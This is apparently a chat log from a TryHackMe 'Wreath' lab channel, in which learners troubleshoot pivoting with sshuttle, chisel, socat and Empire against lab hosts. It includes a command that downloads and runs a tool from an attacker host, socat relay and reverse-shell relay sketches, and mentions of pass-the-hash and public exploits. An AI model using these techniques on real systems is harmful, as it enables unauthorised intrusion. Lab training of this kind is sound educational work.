Anyone like to be the magical 5th to reset the server? 😄

What's your subnet?

90?

84. It's okay was just a slow reboot. I'm struggling with one of the tasks and wanted to rule out the fact it'd been online for 12 hours.

I've been raging for ages on Task 29 and now I realise the -S in the php server is actually case sensitive haha 😦

Hello, I have a small problem to access the windows machine from a compromised server, in my terminal I am told that I am connected to the server but when I type the ip 10.200.81.150 in browser I can not access it

.150 is the Git Server. Which task are you on?

I am on task 28

Task 28 is Empire hop server?

yes

So you've already been connected to .150 with whatever tunnel in the previous sections?

yes, it worked yesterday but now it doesn't

You'll need to re-add ports to the firewall exceptions.

I used sshuttle so sshuttle to webserver (.200) then can view the git server in a browser (.150)

I also use sshuttle but I can send you a screen in mp I don't have the permission here ?

!docs verify

You can post screenshots once you verify.

okay thanks I'll do that and send you

Just post in here no need to DM.

so it doesn't work

I can't access it at the .150

IP addresses have 4 octets. 🙂

It's like me and my case sensitive PHP server flag yesterday. It's always the simple things.

I did not see, 10.200.81.0/24
it works now

yes it's true, I made an error of inattention

And also I had a last problem it was when I wanted to create a http_top listener it put me an error

im starting wreath now... god rest my soul

After starting the web server with 'sudo python3 -m http.server 80' in task 17, how can you see that it is running as the video says at 1:41?

Will look like this.

That's how it appears to me, but if you see the support video, the person can execute commands or has a root user that I don't understand how to access him after he says 'let's go to our python server' in the minute I mentioned before. the part that shows me, being there, I can't continue with the task.

or tell me please from where do I run this 'curl ATTACKING_IP/nmap-USERNAME -o /tmp/nmap-USERNAME && chmod +x /tmp/nmap-USERNAME'?

Well, break it apart and think about it.
What are those commands doing?

Hey Muiri, I completed this room at the weekend, it was great. Really informative and well put together. Thanks for your work.

Gave +1 Rep to @merry robin

Glad you enjoyed it 🙂

Really nice to learn about pivoting through networks like that. 🙂

50% done with wreath. man my mind is blown

It was the first THM room where I realised I needed to be more organised haha. At one point I had my terminal split into many different windows, sshuttle here, chisel there, ssh in another, curl requests in another etc haha.

Should have seen my Tmux panels during testing

am I terrible for quite enjoying qterminal and not having learned tmux yet

I think I've gotten used to the Ctrl E/D/R shortcuts and now tmux hurts my brain.

i justuse the normal kali terminal. i have sshuttle and chisel next to each other, then the py servers i ran, then id run shells/winrm/ssh next to it

@merry robin thank you for the great teaching points omfg

Gave +1 Rep to @merry robin

Hello everyone, I feel like the web server is struggling atm, is everything ok ? (EU-West)

Wreath doesn't have regions

Hey fam, requesting for a reset 4/5

The routes are messed up

There's several instances

Please state which instance you need resetting

Could you be a bit more clearer? Cause I don't see a region associated with networks, like EU

.

The third octet of your addresses is the instance

There are no regions

Its 57 if I remember it correctly

You can vote to reset every hour so I recommend doing that anyway

Great! Will do that, thanks for that :)

Hi, I am at task 18 git server pivoting. I used sshuttle to take access when I got connected its saying

"Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache."

and i can't open 10.200.57.150 on web browser can anyone help ?

Screenshot @mellow kernel

well i resolve that DNS error

I'm going back over it today to do an official pen test write-up for my own XP. So I could probably see what I did because I think I had that issue as well

but how do i access .150 webpage

Add it to your hosts.

Whenever you did the in-map scan it should have said cannot reject you something. something

Redirect

Add that name as well as the IP address to your host file

Nmap,**

no nothing like that happen when i did nmap

You will soon realize that most of everything behind a public facing IP address that they give you you will have to add to hosts

It didn't say anything under port 80?

it just gave me live hosts and ip i should do it again

It should have said something like cannot contact Port 80 or something and it redirected from something.thm

I'm not at my computer so I cannot pull up my host file but I can give you the address and such whenever I get back to it

Try and add the dot 150 address hosts

i did nmap again this is what it returns

Nmap scan report for ip-10-200-57-150.eu-west-1.compute.internal (10.200.57.150)
Host is up (0.00070s latency).

show your shuttle command

sshuttle -r root@10.200.57.200 --ssh-cmd "ssh -i id_rsa" 10.200.57.0/24 -x 10.200.57.200
c : Connected to server.

i tried curl 10.200.57.150 through ssh and the whole terminal got stuck

cant ctrl + c either had to close it

So here's the thing. Everything is correct and if it says connected to server you are fine. If it doesn't go down or kick out any errors you are

Connected

Connected to dot 150, it took me about 4 to 5 minutes for the page to load

Is this the part where you foxy proxy too

if i ping to .150 i should get a reply ?

how do I confirm i am connected any command ?

If you're connected to a shuttle you should be able to ping.150. the problem is it's an internal Network so if you're outside of the internal connection you won't be able to ping anything

Screenshot with s shuttle says for me whenever you connect

write now i am connected

with sshuttle

wait i just got an error from sshuttle

client_loop: send disconnect: Broken pipe
c : fatal: ssh connection to server (pid 5531) exited with returncode 255

Okay there's an error for the broken pipe in the wreath section I think

how do i fix this ?

i am already using -x and excluding .200

can someone help still stuck at task 18

Hello, I have problems connecting to the wreath-network, I run the openvpn file and in the access section it appears disconnected, what can I do in this case?

Ignore the access page

could you help me with task 18, I have tried everything now its not working for me

No, I cannot.

could you reset wreath ?

No, I cannot.
Mods are not site staff.
Mods are not support staff.

There are many many instances of wreath. If you'd like help resetting your instance, please specify what instance which is the third octet of machine IPs.

.57

You can add an additional vote to reset every hour, so you're able to reset the network yourself over time.

Do you mean that it is not necessary to show the Internal Virtual IP Address and the Connected well configured for it to work and that way I will have a connection with the wreath machine?

I mean explicitly what I said, ignore the access page.
It is unreliable, and hence a terrible indicator of connection status

I understand, but the truth is that I ping the machine and I don't have a connection... so I can't perform the tasks of the wreath

Ok, and that is indeed an issue.
But that issue is unrelated to the access page, and does not indicate that you should trust the access page.

any advice?
should I download a new configuration file?

Hello, I am struggling to understand the chosen orden in the socat command I highlighted in my screenshot.
I understand that the first address is the source, and second one the destination. So if we want to get access to the webserver on .10:80 on our .2:8001, why do we have to put the .2:8001 first instead of putting .10:80 ? Hope this was clear enough

Because to me the stream goes as this : Target Webserver (source) --> compromised machine --> local attack machine (dest)

where am I wrong here ?

To add to my confusion, the following command socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & is forwarding everything reaching port 8001 to port 8000, which makes sense to me (source, destination)

hello, in task 18, what is the id_rsa that should be used to be able to execute sshuttle?

The same one you use to log in

The ssh part of sshuttle is ssh

It's not a source and destination -- socat creates bidirectional tunnels between two points.

What goes into port 8000 locally will come out of port 8001, and vice versa.
The remote socat command (I.e. the one on the jumpbox) connects 172.16.0.10:80 to your local port 8001

I.e. what goes into port 8000 on your box will come out of port 8001 and get forwarded to 172.16.0.10:80

Then the response from 172.16.0.10:80 goes straight back through the tunnel.
.10:80 -> .2:8001 -> .2:8000

Ooh I see ! I saw something false somewhere else then, thanks a lot for your time
This clears up a lot of (useless) confusion 🙂

Np :)

Sorry but I don't understand you, can you explain to me in an illustrative way which id_rsa I should use please?

Which? There's only one

I see you don't understand me.
What private key should I use in task 18?
I don't know how else to ask you...

There will only be one.

haha, leave it like that, thanks, I'll ask the others to see if they give me an answer

Gave +1 Rep to @strange bison

Does anyone know what is the content of the private key used in task 18?

Is there an issue with ssh on octet .101 on the .200 box?
I was connected yesterday just fine, but now I can't ssh or use sshuttle on the initial webserver - just get a 'connection closed' error.

I've confirmed I can ping the machine and ||use the webmin exploit to access the shell through there. ||
||I've also confirmed that ssh is open on the machine and the id_rsa file I have matches the one on the box itself.||

I should also clarify that I have reset the network since this issue and it still happens

are you using the -X flag

No, because I'm not getting either the c: connected message or the broken pipe one. There's just no response. When I was connected previously, I did not need to use the - x flag.

Completing wreath really unlocked a new skillset for me. Thanks THM

Yw

https://tenor.com/view/my-liege-monty-python-holy-grail-liege-my-couch-gif-17609083

what do you recommend guys? can i stilldo this on attackbox or my own vm kali?

"Official" answer would be to use the attackbox, and most of it will work in the AttackBox.
Practically speaking, you'll find it easier to use your own box for a plethora of reasons.

Thanks

I sshed into 10.200.87.200 and i tried to curl http://10.200.87.150 but i gets stucks i dont get a response back or any kind i tried nmap -p80 10.200.87.150 from 10.200.87.200 i get 80 as filtered

i tried reseting the box

my vm is connected to the network but there is no ping

or nmap scan there is no result

any reasons as to why?

same here

i recently reseted the machine because of this

cool

thanks

no still it didnt resolved the issue

still not?

no can you ping it ?

no reply

i cant

10.200.87.200 works fine for me the rrest two doesnt work

lets see

when is the latest i can get back after all the reset to do the room again?

after how long time?

single user can reset once per hour

Which network?

Normal VPN pack or the Wreath VPN pack?

wreath

No idea then I'm afraid. I can't debug the network status

ok

i could nmapit but couldnot get the webpage to open even i add the ip address to etc/hosts

any staff can look into this ?

@final olive did it resolved for you?

still its been 24hr and 2 resets can you please notify any of the thm staff ?

I was able to login with || evil-winrm as Admin (Pass The Hash)|| yesterday
And now it just refuses to connect

NVM forgot to ||use sshuttle|| :p

Hi there I try to use chisel with proxy. When I use chisel server on my kalibox it works, but when I try to use chisel client on my kalibox it does not work. Then comes a connection error, does it have something to do with the firewall? Should I try to change the firewall settings? Many thanks in advance! Here is a screenshot...

Use a colon to separate the IP and port. Right now, in your client, you're using 10.200.57.200.8080. it should be 10.200.57.200:8080

Thank you! But even with the change . -> : the error is the same. Any ideas?

Gave +1 Rep to @fervent summit

Hi, the host seems down, can someone please vote for restarting the network?

Having some issues downloading the Webiste.git directory through evil-winrm.

It says completed almost immediately yet nothing is downloaded

Has anyone tried VPN tunnels over ssh with adding interfaces to not have to rely on socks proxies over proxychains?

It will work, yes.
That was something I chose not to add into the network, but was intending to put into a follow-up box a while back. It has been tested in the Wreath network though.
That said, you will need socks proxies anyway -- all SSH Tunneling would do is get you through the first box, which you can use sshuttle for anyway. Still need proxying for the Windows sections

Shuttle is good until you have to scan anything. Not sure other people have this issue but when I use nmap over sshuttle it just says all ports are open even the closed ones.

Tried to do VPN over ssh without sshuttle by adding the interfaces and setting up Nat. But it doesn't route properly. The route you would put for 10.200.X.0/24 is already cleaned by the ovpn connection.

Trying to just state a single route with 10.200.X.150/32 doesn't break the route but nmap doesn't seem to see the first windows machine through the ssh vpn tunnel. Even if you try to specify interface with -e tun1

hi
im doing wreath room
but the exploit isn't working

task 6

this is the error am geting

[-] Failed to connect to https://10.200.105.200:10000/

@merry robin

Will try sshuttle with nmap -sT TCP scan.

I'm having trouble building the bash script to check on ports are active and allowing ICMP... do you have a recommended resource to get better at this? what was your approach?

I know the basics of what is going on here but I might be missing a piece or two

do you want to add command line options to your bash script so you can specify options/flags like you can do with nmap

@nocturne zodiac using -sT didn't work over sshuttle

shuttle says closed ports are open

yes, this is related to the last question of Task 9

+rep @lilac ibex

Gave +1 Rep to @lilac ibex

+rep @nocturne zodiac

Gave +1 Rep to @nocturne zodiac

All good. Was worth a try though

I have a few questions about Task 13 Pivoting Socat

I was able to get through the point where I retrieve the executable from the attackbox but can't get the full reverse shell relay going

tried getting a portable nc from github but now failing to compile it locally before shipping it to the vulnerable server

I think that is the only missing piece in both the paths to 'reverse shell relay'. How do I tackle this on this lab?

@raven whale I did this with a mix of sshuttle, chisel, and metasploit.

Can try again later with socat if you still need help when I'm free.

Sounds good @lilac ibex. Thanks!

Gave +1 Rep to @lilac ibex

@raven whale socat on first pivot to get revshell from second machine right?

correct... I'll see if I can get back to it today. I'll let you know what I find out @lilac ibex

well... I can't reach the prod server... just put in a request for reset and we need 3 more for it to take effect

https://tenor.com/view/robertidk-just-one-more-jacksepticeye-septic-talk-one-more-time-gif-7535550

and we have the reset

THANKS!

@raven whale got it with redirection as shown in socat section but not sure how to do it with full socks proxy over socat. However make anything like a firewall isn't getting in the way ;'..;'

Going back to 'what the shell?' to review proper implementation of different types of shells

@lilac ibex ^

@raven whale powershell reverse shell through socat relay
<lhost-attacker> <pivot-socat-relay-no-socks-proxy> <internal-machine1>

<listener> <----[revshell]----- <relay-pivot> <---[revshell-ps1]--- <internal-machine-one>

haven't tried chaining together for duel pivoting though

would Assume you would do the same thing 2x for every other pivot or through another pivot technique

Reverse shell with socat. Did bind shell when playing around with metasploit.

I'll give those approaches a try later today. Thanks @lilac ibex!

Gave +1 Rep to @lilac ibex

I may have broken the wreath network (prod-serv) during an alternative pivot attempt a few seconds ago - sorry😳

Hello am I on Task 20 and I added the info to etc/hosts but I cant get access to it:
So is my etc/hosts:

Learning

10.200.101.200 thomaswreath.thm
10.200.101.150 gitserver.thm

i can access using the ip 10.200.101.150

reset network?

I just completed the room, it was running fine

Its a long room but its fun 🤣

yes hahah, I learned a lot from it

I don't quite understand what they mean when they say "transfer the private key to the box". To make sure. Do I have to take the "id_rsa" key that I generated with ssh-keygen, and put that into the .ssh directory of root on the network?

Just to make sure as I don't want to break the box

How about putting it somewhere where it won't overwrite the existing key

Like, /tmp, for example

would /tmp work?

oh

Mhm

Wow. It takes so much brain power to actually understand SSH tunneling and port forwarding 😭

Heh, that's just port forwarding and proxying too. Be glad I didn't include the instructions for true SSH tunneling
Was considering building out a sequel for those, but time and motivation 🤷‍♂️

What would you say is the hardest topic in penetration testing. Forget about "depends from person to person". What is the hardest topic for you in Cyber Security? Is port forwarding and ssh tunneling one of them haha?

I really dislike Reverse engineering, as i find it hard. Cryptography is also hard 🤷‍♂️ I think it'd be difficult to find a single hardest thing

"Penetration testing" is a topic in and of itself, usually covering one or more of infrastructure testing, cloud configuration tests, web application testing, code / software review, etc.

In terms of hacking generally though, I'm not a huge fan of binex (binary exploitation) at this point in time, personally. I intend to deal with that as soon as I've finished OSWE 😆

Port forwarding and tunnelling are easy, they just need decent networking foundations. Once you understand how traffic flows around a network, forcing it to take another route is fairly straight forward.

Have you ever actually needed to pivot on a test though? Genuinely curious as I've not even see anything other than large single domain env's with no need to pivot at all so far.

Eh, not really. Once you're in a domain it's almost certainly just gonna be straight-up lateral movement.
Honestly I use it more often to get into my work lab environment lmao

Normal people just run a VPN server to get into the env

Yeah, tbh, I usually am DA before I even get on a windows machine

all my jobs have been citrix

It's a useful skill to have though. Only time it's likely to be useful irl is if you've compromised a jumpbox though

Yeah, figured as much.

Heh, try working in a bank

Hello,
at task 42. How did u manage to upload winpeas and which one did u guy oploadP

Evening. I just have one question. In the second example it supplies 2 ip addresses. '172.16.0.x and 172.16.0.5' but in the command is as follows: 'sshuttle -r user@172.16.0.5 172.16.0.0/24. Is the '172.16.0.0 a new ip address or does it refer the .x address? And is the /24 a port? Thank you

no.... 172.16.0.0/24 is a way to mark a whole subnet

this image might help a bit

so subnetting is basically dividing a network into two or more networks?

yuups kinda

the #pre-security-legacy-path slightly goes over this if you have not done that yet

Those numbers are confusing ngl 😂

Ive done that room

I just don't remember what exactly I've learned there

Thank you for dis

Gave +1 Rep to @split harbor

did you skip the essential note taking??

haha in the beginning yes. But I make sure to dot down everything :/

Time to go over that pathway again. 2 steps forward one back

nah 1 000 steps forward and 1 back to remake notes

Indeed 👍

Best advice I can give you here is to go back and learn how things work before you start trying to attack them. I say that as the guy who built this thing, but I mean that just generally. Trying to build with no foundations will never end well. You won't understand what you're doing, which means you'll break stuff, which means you'll get fired, assuming you even manage to get a job in the industry without said foundational knowledge.

That's a general statement for the record, "you" applies to anyone in a similar position, rather than just yourself 🙂

There's nothing to be gained from leaping in two-feet first without understanding the underlying technologies, and no shame in taking the time to learn them properly before starting with the "cool" stuff. Perfect example is above: attempting to attack a pivoting network without understanding how networks work. In a lab environment you get confused and need help. IRL you break shit and cause big issues 🤷‍♂️

network responding super slow

ye 10.200.101 seems to be down or not working properly - it was running extremely slow so I let it expire and upon restarting cant connect or see anything scanning after ~20 minutes

i try later 🤷‍♂️

Im having trouble at task 20 where I actually have to run the python script to exploit the gitstack service. I'm getting an error

If someone could help me that would be really nice

do python3 -m pip install requests

No matter what command I use to install the requests I get this error. Is there a way to uninstall and reinstall them?

When trying to uninstall them it says this

ah maybe it is python2 and not python3

Like this?

yuup

but first python2 -m pip install requests

/usr/bin/python2: No module named pip

Why not check what's in the shebang?

because shadow has not started this network and therefor do not have script

Ive added the /usr/bin/python there

wait

I guess i've got something working but not really

EDB number is there, so you could grab it

true

have you guys done this room?

I have.

You're trying to run it as a bash script here

Just... python3 43777.py

but the code is written in older python

Muireland used ./

Ok, then use python2

And make sure you install the library for python2

This is why we use Kali, one of many reasons. It still ships the libraries and pip.

i cant progress because the network isnt working properly. reset it last night and worked fine for when I was using it but logging on again this morning i cant connect its unreachable

There is a Python 3 conversion of that script literally pinned in this channel

Thank you Muiri. I've not know that

Hi here, I'm trying to exploit the web server from task 6 and I'm using the exploit from MuirlandOracle github but I'm getting this error: Cannot import mappings from "collections". Any clues how to resolve this? thanks!

Screenshot? @azure current

I tried to enable but not getting it to turn on

I have trouble with task 34. I got chisel runing and can connect to the page via proxychains. But wappalyzer gives me the wrong version number. XXX #.#.# instead of XXX #.#.##

I also tried whatweb through proxychains but rthis did not work. Is thee a similar extension I can use?

Oh and even XXX --version on the git server gave me the sam versionnumber which wappalyzer provieds...

Appologize, i was on the wrong machine 💀

Hi, I'm trying to connect to Wreath network but I'm getting this:

$ ssh root@10.200.101.200 -i id_rsa
ssh: connect to host 10.200.101.200 port 22: No route to host

I'm using a personal kali linux machine with openvpn:

$ sudo openvpn xxxx-wreath.ovpn
[...]
2022-09-24 12:40:26 OPTIONS IMPORT: timers and/or timeouts modified
2022-09-24 12:40:26 OPTIONS IMPORT: --ifconfig/up options modified
2022-09-24 12:40:26 OPTIONS IMPORT: route options modified
2022-09-24 12:40:26 OPTIONS IMPORT: route-related options modified
2022-09-24 12:40:26 OPTIONS IMPORT: peer-id set
2022-09-24 12:40:26 OPTIONS IMPORT: adjusting link_mtu to 1624
2022-09-24 12:40:26 Using peer cipher 'AES-256-CBC'
2022-09-24 12:40:26 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-09-24 12:40:26 Outgoing Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-09-24 12:40:26 Incoming Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2022-09-24 12:40:26 Incoming Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2022-09-24 12:40:26 net_route_v4_best_gw query: dst 0.0.0.0
2022-09-24 12:40:26 net_route_v4_best_gw result: via 192.168.1.254 dev eth0
2022-09-24 12:40:26 ROUTE_GATEWAY 192.168.1.254/255.255.255.0 IFACE=eth0 HWADDR=00:e0:4c:82:01:5f
2022-09-24 12:40:26 TUN/TAP device tun0 opened
2022-09-24 12:40:26 net_iface_mtu_set: mtu 1500 for tun0
2022-09-24 12:40:26 net_iface_up: set tun0 up
2022-09-24 12:40:26 net_addr_v4_add: 10.50.102.160/24 dev tun0
2022-09-24 12:40:26 net_route_v4_add: 10.200.101.0/24 via 10.50.102.1 dev [NULL] table 0 metric 1000
2022-09-24 12:40:26 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2022-09-24 12:40:26 Initialization Sequence Completed

┌──(rodolphe㉿LAPTOP-KALI)-[~/…/Cyber/THM/Wreath/tmp]
└─$ ip a 
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
24: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_pie state UNKNOWN group default qlen 500
    link/none 
    inet 10.50.102.160/24 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 fe80::8923:8577:542a:16f/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever

I have the same issue :/

try to ping the ip

and then do simple port scan or nmap scan to check that ssh service is running on which port

Read the error message...

"No route to host". i.e. couldn't get into the network.

but he is connected to vpn

Whether that's local routing or a problem with the network instance I have no idea.

and if he will ping that ip

he will get some clue

Then they will get no route to host

Same as when they tried to SSH

then local routing prblm

Or a problem with the network instance.

More likely the latter to be quite honest.
Either way I do not have the power to debug it.

i would debug like i told

it may be possible that ssh service not available on that port

Then the error would be "connection refused"...

yep you are right

Muirland is the creator of Wreath.
I'd recommend his advice first and foremost.
Please make sure any troubleshooting advice you give is accurate, your advice here isn't overly applicable.

sry

hey im facing issue downloading the vpn pack it say 404

can anyone help?

Hello guys i'm trying to ssh as root on prod-serv but 'im getting this:

ssh -i id_rsa_webmin root@thomaswreath.thm
Load key "id_rsa_webmin": error in libcrypto
root@thomaswreath.thm: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

who mess up wreath network? 3/5 votes to restart the lab

I knocked it up to 4/5, just need 1 more

Please specify the instance when you're asking for resets. You can add a vote every hour too.

Hi ! I have "zsh: segmentation fault ssh -i rsa_id root@10.200.90.200" when trying to connect ssh so the pivoting with sshuttle cannot be done 😦 anyone faced this issue ?

try changing shell to bash and running the same command there???

bruh now I have "root@10.200.90.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
" any tips or It is supposed to be like that ?

the command :

if anyone has infos pls ping me

litteraly stuck here for a day

After resetting the labs I still have this error any help @merry robin

This machine is unreachable

Nevermind I used chisel, ssh is broken

Not too sure what I am doing wrong here...can anyone take a look at my screenshot and throw some advice my way haha? thank you.

The id_rsa key that I am using is the same one that we are able to find in the roots .ssh. Is that the correct key to use for this?

....Anyone having this issue just add sudo. #K.I.S.S. 😂

~~can someone vote to reset please 10.200.81.200 isn't responding ~~ tyty

Anyone else on 10.200.101.200....can we reset? Need 3. Thank you

so just do sudo ssh IP -i id_rsa?

will do and come back

prod-serv IIRC does not allow you to log in whatever you do, you need the password

Put sudo before the sshuttle

Also make sure you have the id_rsa perms set to 600

Evening. I'm havning some trouble to start the php server on the port that my listener is on. I think im getting confused with some of the port. Any help would be appreciated

You can't start it on the port you're already listening on, I suspect something has gone wrong here

But how am I supposed to catch the agent?

if I can't listen on the port 45000

Your c2 is listening for the connection

Assuming it's a reverse payload

yes the c2 listener is listening on port 45000

so I cant listen on port 45000 with the php server?

Because on dark secs video he has a listener on 17000 and then also starts the php server on 17000 so I'm not quite sure how he did that

Okay I got it to listen but now it's giving me this error: "[root@prod-serv hop-apollyon2]# [Fri Oct 7 19:04:01 2022] 10.200.85.150:50196 [404]: /news.php - No such file or directory"

anyone having problems with vpn file? cant download it

Please elaborate. What do you mean by can't?

Looks like a problem with your kali tbh. Download it on your host of it's a VM

Then copy it in

made it, thanks

Gave +1 Rep to @strange bison

getting problems with connection on vpn wreath

Please provide more information.
"Problems" doesn't tell us anything

well...access machines doesnt turn to wreath ip

Ok. That's not a problem.

should work anyway?

Why not try it?

im trying to nmap the two others machines and nothing happens

You're apparency connected to one then

So that's not a VPN issue

i made the first one yesterday... so anyway, everything aparently work fine?

I didn't say everything

You asked about the VPN so I answered about the VPN

ok. and what could be wrong with nmap on the other two machines?

Without knowing more about what you're doing, and then troubleshooting, I can't say.

task 17 git server enumeration, trying to nmap 100,150

You've just reposted the same thing again.

"Failed to execute command" looks like the problem there. Doesn't look like a network issue.

you told me "Without knowing more about what you're doing, and then troubleshooting, I can't say."

ok

Without knowing more. You posted the same thing again. That's not more.

will take a look on the nmap scan

dont know what more to say.. thats the problem then, nmap those ip

Probably been asked before, but how long does it normally take to spin up the network? Still no ping at 27mins here now 🤔

that is not normal

usually 5 to 10 in my experience

I just wrapped up wreath. Big thanks @merry robin for the amazing experience.

Gave +1 Rep to @merry robin

someone having issues when running empire? my machine is working very slow...

Hey guys for the wreath network -- just to clarify we have to laterally move from the first foothold to a different box (with windows & other) correct if im wrong

Spin it up real quick man

anyone up doing wreath rn ?
trying to ssh to web server , but keeps getting errored out
root@10.200.85.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic)
to add: my ssh private key permissions are 600

Are you, uh, not following the tasks of the room?

Nope, im attempting to get the box before I redo it again and follow the room task

im already at the late stage

its kinda more of an educational thing for me aswell

Hey man whats the error?

The problem is that these are shared labs, and you might do something that disrupts others' experiences

I also got the same issue..
Trying to ssh into the box with the private key produces that error

May I suggest following the instructions that explain the killchain of the network, rather than trying to wing it then asking for help?
Those things are there for a reason.

That and, as James said, there are specific instructions about how to approach things in a way that does not mess up the lab for other people

In particular regarding changes to configs, updating firewall rules, naming conventions for uploading scripts / tools, etc

Case in point is above -- some moron has overwritten either the private key or the authorized_keys file on .85.200. That's one or more of:

• Stupidity
• Not reading the instructions
• Malice
  Either way it now requires everyone else in that lab to disrupt their own experience and reset the boxes.

(Side note, if you're on 10.200.85.0/24 and that was you, please vote for a reset and follow the instructions for how not to fuck it up lmao)

*100.200.85.0/24 😉

Ta James

No, I am on 10.200.90.0/24

Also, i did followed the instructions and it just gave me more confusion. I wont ask again thanks

What was confusing? 🙂

Its all good thank you ill find a way

Hello to all. I am working on Wreath after the stage of the operation of the Webserver, I noticed that its IP address is no longer reachable. I tried to restart the room, change the VPN file but when I try to ping it doesn't work. Can anyone help me please?

Jumped on today to try and pick up where I left off yesterday - the network is no longer responding to ping (gives error Destination Host Unreachable), can't ssh in (gives error "ssh: connect to host 10.200.85.200 port 22: No route to host"). I've voted for a reset but it's only at 3/5 so any help would be appreciated @merry robin cheers!

Nothing I can do I'm afraid 😦
I've never had access to the network administration interface -- I just built the thing 🤷‍♂️

think you can add a vote every hour or so too

all good! thanks for the reply, I'll just vote for a reset again in an hour

Gave +1 Rep to @merry robin

@merry robin i am going to begin my journey in this path, im totally flabbergasted of content in this room. however compliments to you and wish me luck in this room 🙂

Gl 😄

ok so im trying to nmap the webserver

and it is taking ages

like ages

cant even ping it might be the firewall tho

hello!
i am trying to use sshuttle for the first time and im getting this error but dont really know what does it mean or what am i doing wrong. can u guys please give me a hint?

Are you using WSL or similar?

yes, i am using wsl

It won't work then

noooooo

Make a VM, it's generally better. Snapshots are cool.

alright. thank you

Gave +1 Rep to @strange bison

hello

how normal is this?

Quite. Means you didn't compile it statically.

ah. yes. that explains everything:) thanks

Gave +1 Rep to @strange bison

hello again. i cannot access the network after it went to sleep because i forgot to extend time. yesterday same thing happened.

unable to connect through vpn

can you curl 10.10.10.10/whoami

if that gives you an ip you are connected

Not to the Wreath network you ain't

10.10.10.10 is in the public subnet

sooo that is not a way to check if you are connected to wreath??? welp then that is a problem shadow dunno how to handle

The machine is not showing up while ping

Hi everyone, did you know why the machine about Wreath doesn't work ? i checked my vpn and generated another one nothing append, how can i fix that ? Thanks

Are you using the Wreath VPN or your normal VPN?

@waxen nebula Wreath vpn

And you've checked the status that it's connected? What response do you get? Have you tried connecting using the AttackBox instead?

status about vpn when i am connect with vpn wreath is acces machine in red color i'll try with AttackBox and i give answer asap when it's up

Destination Host Unreachable with AttackBox @waxen nebula

Have you completed the NMap room, suggested in Task 5? Have you tried different switches with nmap?

yes task 5 is completed with nmap i'm actually at 14 and have tried another switches with nmap but nothing

Can someone please explain to me why on earth metasploit portfwd is not working?
The first time it works just fine and then it just hangs when I make requests to my machine. curl also does not work, it seems to be loading infinitely. Was this made on purpose?

yes for me too

v

yay now suddenly it works

hi I'm in task 6. at first the id_rsa file was empty but now I'm getting the root@10.200.85.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic). even after i got the rsa file. can someone help me figure this out or show me where to look for the answer please?

Unfortunately, the chances are that it's not your fault. These are shared networks, and many people are, frankly, either absolute assholes who like spoiling it for other people, or idiots who can't follow instructions and break it for everyone else by accident.
I added extra protections to that file, but it still gets broken fairly frequently and I don't have access to improve it anymore.

If the key is missing, go for a reset.

I found the new one next morning but it disent work it gibes me a premisiondenied(publickey,gassapi-keyex,gassapi-with-mic) error i checked the config file on both attack machine and tge victam machine and they simed fine idk if itd the new key that is the problem or im missing some thing becuase idk how thr key just appiered next morning.

Hey, i keep getting timeouts when i try to access the homepage via FF in "Webserver Enumeration". I changed the host-file and the dns works but i still get timeouts. Is this a known problem if the network is borked? Or is this more likely my machine? I can scan and ping the machine.

@marble flax

daw

So I downloaded the id_rsa to be able ssh back into the prod server… but when I attempt the ssh, sometimes it just stays with no output ever happening until I finally Cntl C it, and sometimes nothing happens for a few min then it tells me ‘connect to host 10.200.105.200 port 22: connection timed out’ … I can ping the server no issues, I even tried a plain ‘ssh root@10.200.105.200’ to see if I get asked for a password but no I just get the exact same response - nothing happening or sometimes that timed out response…. When I add a -vv the final output before nothing else happening until I close it out reads - ‘debug1: expecting SSH2_MSG_KEX_ECDH_REPLY’ - that’s when trying to use rsa key, and when doing a -vv on trying to connect with password instead of the key, it gets stuck on “debug1: connecting to 10.200.105.200 port 22” before getting connection timed out ultimately …. Any suggestions?!? Thanks in advance 🤘

I think the keys are messed up because i have problem with the private key on the other machine . Abd the public keys are changing every day it either some one messing with them or people cant find it and just generate thier own.

Ehhhhhh okay that sheds some light on the issue, thanks

Hello guys

Can't download wreath network vpn config file.

It is only redirecting to a 404, any help?

hi i checked the ssh_config file on the server and i saw that the password authentication is commented out and i believe that is what preventing me from sshing into the system. i cant change it and i don't want to break anything trying so if i can het some help with it would be great. this is the error that I'm getting if its relevant: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

That is correct -- it just means that you can only connect using a key, not with a password.

The error you're getting is usually when some idiot has overwritten the key on the box, or removed the protections on the authorized keys file to overwrite that

TL;DR: reset the network and try grabbing the key again 🙂

thank you

Can confirm . Was banging my head on this same issue for 2 hours. I'm also using WSL.

─$ sshuttle -r root@10.200.84.200 10.200.84.150/8 --ssh-cmd "ssh -i id_rsa" -x 10.200.84.200
c : Connected to server.

Warning: ip6tables-legacy tables present, use ip6tables-legacy to see them

ip6tables v1.8.8 (nf_tables): CHAIN_ADD failed (No such file or directory): chain OUTPUT.......

I can’t get my wreath network vpn to work, anyone else?

It just says network unreachable

should you be able to ping 10.200.xx.100 from 10.200.xx.150?

is the network working?

Yes

Hi, this is related to https://tryhackme.com/room/wreath : Web server exploitation section:-- while running script :- I am getting this error python3 CVE-2019-15107.py . Please help
raceback (most recent call last):
File "/home/kali/tryhackme/AD/wreath/CVE-2019-15107/CVE-2019-15107.py", line 10, in <module>
from prompt_toolkit import prompt
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/init.py", line 16, in <module>
from .interface import CommandLineInterface
